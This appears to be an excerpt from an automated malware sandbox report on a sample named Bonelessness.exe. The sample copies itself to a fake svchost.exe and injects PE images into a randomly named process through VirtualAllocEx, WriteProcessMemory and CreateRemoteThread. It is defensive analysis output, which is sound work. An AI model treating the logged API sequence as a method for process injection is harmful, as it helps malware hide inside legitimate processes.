      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1460000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2900000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D20000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1560000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Windows\apppatch\svchost.exe base: 31E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Windows\apppatch\svchost.exe base: 31E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00401B70 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401B70
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00401B70 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,1_2_00401B70
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D448D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,1_2_02D448D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028B48D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_028B48D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024648D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_024648D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013048D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,8_2_013048D0
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: E41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: D51360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 1281360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 9A1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2E41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2D81360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: C21360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: B91360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 1021360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2341360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 3011360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 851360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2961360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2E91360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2651360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: E41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B01360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2881360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2C71360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2DD1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BA1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1321360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BA1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BA1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D51360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2CB1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2FB1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2341360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 24E1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FF1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DB1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2551360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2491360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2921360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1331360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 951360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2AF1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C11360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 6B1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BF1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2821360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D51360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2731360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D71360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1051360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2911360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: EE1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B71360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3031360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2861360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D91360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DA1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 801360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C01360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2B71360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9D1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2251360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BA1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FB1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2551360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F41360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DB1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 7E1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DA1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1461360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2901360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 23E1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DB1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D21360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1561360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 31E1360Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 31E1360Jump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtClose: Direct from: 0x76F02B6C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtSetInformationThread: Direct from: 0x76F02B4C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQuerySystemInformation: Direct from: 0x76F048CC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtSetInformationFile: Direct from: 0x76F02D0C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtOpenSection: Direct from: 0x76F02E0C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtSetInformationThread: Direct from: 0x76EF63F9
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQueryValueKey: Direct from: 0x76F02BEC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtCreateFile: Direct from: 0x76F02FEC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtOpenFile: Direct from: 0x76F02DCC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQueryInformationToken: Direct from: 0x76F02CAC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtSetInformationThread: Direct from: 0x76F02ECC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtTerminateThread: Direct from: 0x76F02FCC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtMapViewOfSection: Direct from: 0x76EF7B2E
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtOpenKeyEx: Direct from: 0x76F02B9C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtSetInformationProcess: Direct from: 0x76F02C5C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtUnmapViewOfSection: Direct from: 0x76F02D3C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtCreateMutant: Direct from: 0x76F035CC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtMapViewOfSection: Direct from: 0x76F02D1C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtResumeThread: Direct from: 0x76F036AC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtSetValueKey: Direct from: 0x76F0309CJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQuerySystemInformation: Direct from: 0x1C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtReadFile: Direct from: 0x76F02ADC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeNtQueryInformationProcess: Direct from: 0x76F02C26
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1282000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D82000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C22000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B92000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1022000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3012000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 852000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2962000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2652000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B02000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2882000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C72000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1322000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2492000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2922000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1332000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 952000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF2000 value starts with: 4D5AJump to behavior
